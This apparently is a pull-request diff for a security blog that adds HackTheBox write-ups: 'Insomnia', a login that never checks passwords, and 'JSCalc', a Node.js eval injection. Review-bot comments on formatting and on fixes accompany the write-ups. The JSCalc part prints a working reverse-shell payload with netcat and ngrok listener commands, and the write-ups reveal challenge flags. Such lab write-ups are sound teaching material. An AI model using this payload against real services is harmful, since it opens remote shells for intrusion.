Merged
47 changes: 47 additions & 0 deletions index.md
Expand Up @@ -4,6 +4,52 @@ layout: default

<h1>News</h1>

<hr>
<article>
<div style="display: flex;">
<div style="flex: 1">
<center>
</center>
</div>
<div style="flex: 1">
<h2>HackTheBox - Insomnia - Writeup</h2>
<p>A new writeup for HackTheBox - Insomnia is now Available.</p>

<center>
<a href="{{'/pages/writeups/hackthebox/challenges/insomnia/insomnia'}}" class="btn">Check it Out</a>
</center>

<br>
<small>25 Apr 2024</small>
</div>
</div>
</article>


<hr>
<article>
<div style="display: flex;">
<div style="flex: 1">
<center>
<img width="400em" src="data:image/png;base64,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" alt="">
</center>
</div>
<div style="flex: 1">
<h2>HackTheBox - JSCalc - Writeup</h2>
<p>A new writeup for HackTheBox - JSCalc is now Available.</p>

<center>
<a href="{{'/pages/writeups/hackthebox/challenges/jscalc/jscalc'}}" class="btn">Check it Out</a>
</center>

<br>
<small>25 Apr 2024</small>
</div>
</div>
</article>


<hr>
<article>
<div style="display: flex;">
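Review bot: `width="400em"` on the new `<img>` tags is not a valid value for the HTML `width` attribute, which takes a unitless pixel count; browsers will either parse it as `400` or drop it, so use `width="400"` or move the size into `style="width: 400px"`. Embedding each thumbnail as a multi-kilobyte `data:` URI in index.md also bloats every render of the news page; committing the PNGs under the writeup's directory and referencing them by path keeps the diff readable. Minor: "now Available" should be "now available" in both new articles.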
Expand All @@ -26,6 +72,7 @@ layout: default
</div>
</article>

<hr>
<article>
<div style="display: flex;">
<div style="flex: 1">
16 changes: 16 additions & 0 deletions pages/writeups.md
Expand Up @@ -13,6 +13,22 @@ layout: default
<th scope="col">Writeup</th>
</thead>
<tbody>
<tr>
<td><a href="https://www.hackthebox.com/">HackTheBox</a></td>
<td>Web</td>
<td>Insomnia</td>
<td class="d-flex justify-content-center">
<a href="{{'/pages/writeups/hackthebox/challenges/insomnia/insomnia'}}" class="btn">Read</a>
</td>
</tr>
<tr>
<td><a href="https://www.hackthebox.com/">HackTheBox</a></td>
<td>Web</td>
<td>JSCalc</td>
<td class="d-flex justify-content-center">
<a href="{{'/pages/writeups/hackthebox/challenges/jscalc/jscalc'}}" class="btn">Read</a>
</td>
</tr>
<tr>
<td><a href="https://www.hackthebox.com/">HackTheBox</a></td>
<td>Web</td>
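Review bot: the two new `Read` links emit a Liquid string literal, `{{'/pages/writeups/hackthebox/challenges/insomnia/insomnia'}}`, without the `relative_url` filter, so `site.baseurl` is never prepended and the links break when the site is served from a sub-path (for example a GitHub project page); write `{{ '/pages/writeups/hackthebox/challenges/insomnia/insomnia' | relative_url }}` and the same for the JSCalc row. The surrounding rows use the same pattern, so this is pre-existing, but the new rows are a good place to start fixing it.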
3 changes: 1 addition & 2 deletions pages/writeups/hackthebox/challenges/PDFy/pdfy.md
@@ -1,10 +1,9 @@
---
layout: post
author: k0d14k
title: HackTheBox - PDFy (web)
---

# HackTheBox - PDFy

---

Tags: `SSRF`, **`CVE-2022-35583`, `localhost.run`**
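Review bot: the `Tags:` line bolds only `CVE-2022-35583` and `localhost.run` while `SSRF` stays plain; the two new writeups in this PR (insomnia.md, jscalc.md) use backticks only, so keep the tag formatting consistent across writeups. The rendered view does not show which of the two removed lines went away, so the "1 addition & 2 deletions" summary should be checked against the raw diff before merging.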
111 changes: 111 additions & 0 deletions pages/writeups/hackthebox/challenges/insomnia/insomnia.md
@@ -0,0 +1,111 @@
---
layout: post
author: k0d14k
title: HackTheBox - Insomnia (web)
---

---

Tags: `JSON Password Bypass`

---

> Welcome back to Insomnia Factory, where you might have to work under the enchanting glow of the moon, crafting dreams and weaving sleepless tales.
>

In this web challenge provided by Hack the Box, We have a register/login form.

![Untitled](Untitled.png)

The starting page doesn’t give us any information so We could take a look at the source code provided with the challenge.

```php
<?php

namespace App\Controllers;

use App\Controllers\BaseController;
use CodeIgniter\HTTP\ResponseInterface;
use Config\Paths;
use Firebase\JWT\JWT;
use Firebase\JWT\Key;

class ProfileController extends BaseController
{
public function index()
{
$token = (string) $_COOKIE["token"] ?? null;
$flag = file_get_contents(APPPATH . "/../flag.txt");
if (isset($token)) {
$key = (string) getenv("JWT_SECRET");
$jwt_decode = JWT::decode($token, new Key($key, "HS256"));
$username = $jwt_decode->username;
if ($username == "administrator") {
return view("ProfilePage", [
"username" => $username,
"content" => $flag,
]);
} else {
$content = "Haven't seen you for a while";
return view("ProfilePage", [
"username" => $username,
"content" => $content,
]);
}
}
}
}

```

Reading the code We got the `ProfileController` class. In this class, We noticed that to get the flag, We have to log in as `administrator`.

Let’s take a look at the login functionality to see if there is a security issue in the login implementation. Spoiler, it is.

```php
public function login()
{
$db = db_connect();
$json_data = request()->getJSON(true);
if (!count($json_data) == 2) {
return $this->respond("Please provide username and password", 404);
}
**$query = $db->table("users")->getWhere($js**on_data, 1, 0);
$result = $query->getRowArray();
if (!$result) {
return $this->respond("User not found", 404);
} else {
$key = (string) getenv("JWT_SECRET");
$iat = time();
$exp = $iat + 36000;
$headers = [
"alg" => "HS256",
"typ" => "JWT",
];
$payload = [
"iat" => $iat,
"exp" => $exp,
"username" => $result["username"],
];
$token = JWT::encode($payload, $key, "HS256");

$response = [
"message" => "Login Succesful",
"token" => $token,
];
return $this->respond($response, 200);
}
}
```

Reading the code, We notice that once the username is provided, se server just asserts that a user with that username exists. But it’s not checking the password.

![Untitled](Untitled%201.png)

There We go, now We have a valid cookie for the admin. Let’s use it to get the profile.

![Untitled](Untitled%202.png)

---

## Flag: HTB{I_just_want_to_sleep_a_little_bit!!!!!}
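Review bot: the fenced `login()` block contains stray markdown bold markers, `**$query = $db->table("users")->getWhere($js**on_data, 1, 0);`, inside a ```php fence, where they render literally and split the variable name; drop the asterisks. The analysis line ("se server" is a typo for "the server") also understates the root cause visible in the code: the decoded JSON body is passed straight to `getWhere()`, so the client chooses which columns the lookup filters on, and the guard `if (!count($json_data) == 2)` never fires because `!count(...)` is evaluated before `== 2` and a boolean is never equal to 2. A closing sentence on the fix would help readers: read `username` and `password` explicitly, look the row up by username only, and compare the submitted password against the stored hash with `password_verify()`.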
58 changes: 58 additions & 0 deletions pages/writeups/hackthebox/challenges/jscalc/jscalc.md
@@ -0,0 +1,58 @@
---
layout: post
author: k0d14k
title: HackTheBox - jscalc (web)
---

---

Tags: `NodeJS RCE`

---

> In the mysterious depths of the digital sea, a specialized JavaScript calculator has been crafted by tech-savvy squids. With multiple arms and complex problem-solving skills, these cephalopod engineers use it for everything from inkjet trajectory calculations to deep-sea math. Attempt to outsmart it at your own risk! 🦑
>

In this challenge, We have a NodeJS calculator.

Our focus is to get the flag saved in `/flag.txt`.

Reading the code We notice that, to provide the expression result, the server uses the `eval` function as follows:

![Untitled](Untitled.png)

This is an easy RCE (Remote Code Execution). We should be able to establish a reverse shell using `netcat` and `ngrok`.

In a terminal run:

```bash
nc -nvlp 1234
```

while in a second one run:

```bash
ngrok tcp 1234
```

Now, We can generate a reverse shell using [RevShells](https://www.revshells.com/).

There is just one thing you need to consider, the `calculate` function the `eval` is evaluating a function that returns our `formula`. So to correctly bind our reverse shell We need to wrap our reverse shell in a function.

Our final payload is:

```jsx
(function() {var net = require("net"), cp = require("child_process"), sh = cp.spawn("sh", []); var client = new net.Socket(); client.connect([port], "[ngrok tcp dns]", function(){client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); }); return /a/;;}())
```

And there We go:

![Untitled](Untitled%201.png)

And in our terminal:

![Untitled](Untitled%202.png)

---

## Flag: HTB{c4lcul4t3d_my_w4y_thr0ugh_rc3}
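Review bot: the payload fence is tagged ```jsx but the content is plain Node.js, so tag it ```js; and the sentence "the `calculate` function the `eval` is evaluating a function that returns our `formula`" is garbled and should say that in `calculate`, `eval` is applied to a function whose return value is the `formula`, which is why the payload has to be wrapped in a function. The payload ends with `return /a/;;` (doubled semicolon) and uses the placeholders `[port]` and `[ngrok tcp dns]`, which the text should call out as values to substitute. Since `/flag.txt` and the screenshot references (`Untitled.png` etc.) are the only evidence of the vulnerable code, a short quote of the `eval` call would make the RCE section self-contained, and one line on the fix (evaluate the expression with a dedicated parser instead of `eval` on user input) would round it out.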